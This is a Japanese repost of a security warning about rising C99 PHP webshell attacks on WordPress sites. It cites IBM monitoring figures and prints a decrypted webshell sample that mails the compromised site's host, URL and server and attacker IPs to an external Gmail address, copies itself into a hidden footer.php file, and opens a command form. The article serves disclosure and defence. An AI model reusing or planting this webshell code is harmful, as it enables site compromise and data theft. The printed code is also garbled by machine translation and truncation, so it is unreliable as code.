ホームページ >バックエンド開発 >PHPチュートリアル >wordpress c99 php webshell攻撃が激化 Anheng Mingyu APT早期警告プラットフォーム webshell監査アラーム
wordpress c99 php Webshell 攻撃が激化、安恒明裕 APT 早期警告プラットフォーム Webshell 監査アラーム
最近、IBM のマネージド セキュリティ サービス (MSS) チームは、次のような使用が検出されたと警告を発しました。 C99 php webshell により、多数の WordPress サイトが新たな攻撃を受けており、WordPress サイト管理者はサイトの脆弱性を適時にスキャンして修復する必要があることがわかりました。
セキュリティ研究者は、IBM MSS チームによる悪意のあるイベントの長期監視と分析に基づいて、過去 2 か月間、C99 Web シェルによって引き起こされたトラフィック異常が発生していることを発見したと報告されています。 2月に監視されたイベントの数は404件でしたが、3月には588件に達しました。詳細は次のとおりです。
詳細なニュースについては、
を参照してください。 https://securityintelligence.com/got-wordpress-php- c99-webshell-attachs-increasing/
安恒研究所は Google 検索を通じて c99 Webshell サンプルを収集しました
復号化後、
< php
error_reporting ( 0 ) ; isset ( $_SESSION [ 'bajak' ] )) {
$visitcount = 0 ;
$web = $_SERVER [ 'HTTP_HOST' ] ;
$inj = $_SERVER [ 'REQUEST_URI' ] ; >
$body = "ada yang inject n { $web }{ $inj }" ;$safem0de = @ ini_get ( 'safe_mode' ) ; $safem0de ) {
$security = 'SAFE_MODE = OFF ' ;
} else {
$security = 'SAFE_MODE = ON'
}
$serper = gethostbyname ( $_SERVER [ 'SERVER_ADDR' ]) ;
$injektor = gethostbyname ( $_SERVER [ 'REMOTE_ADDR' ]) ;
メール ( 'cumicd@gmail) .com' , "{ $body }" , "ハシル バジャカン http://{ $web }{ $inj } n { $security } n IP サーバー = { $serper } n IP インジェクター = { $injektor }" ) ;
$_SESSION [ 'bajak' ] = 0 ;
} else {
$_SESSION [ 'bajak' ] ++ ; >
if ( isset ( $_GET [ 'clone' ] )) {
$source = $_SERVER [ 'SCRIPT_FILENAME' ] ;
$desti = $_SERVER [ 'DOCUMENT_ROOT' ] . '/images/stories/food/footer.php' ;
名前変更 ( $source , $desti ) ;
$safem0de ( 'セーフモード' ) ;
if ( ! $safem0de ) {
$security = 'SAFE_MODE : OFF' ;
$security = 'SAFE_MODE : ON' ;
}
echo '
echo '<フォントサイズ=2 color=#888888>' ;
$cur_user = '(' . get_current_user ( ) ' ; 🎜>
echo 'user: uid=' . $cur_user . $cur_user ' /b>echo 'Uname '
function pwd ( )
$cwd = getcwd ( ) ;
if ( $u = strrpos ( $cwd , '/ ' )) {
if ( $u ! = strlen ( $cwd ) – 1 ) {
return $cwd .
} else {
return $cwd ;
}
} elseif ( $u = strrpos ( $cwd , ' \ ' )) {
if ( $u != strlen ( $cwd ) – 1 ) {
return $cwd ;
} else {
return $cwd '< form method=”POST” action=””>コマンド
echo '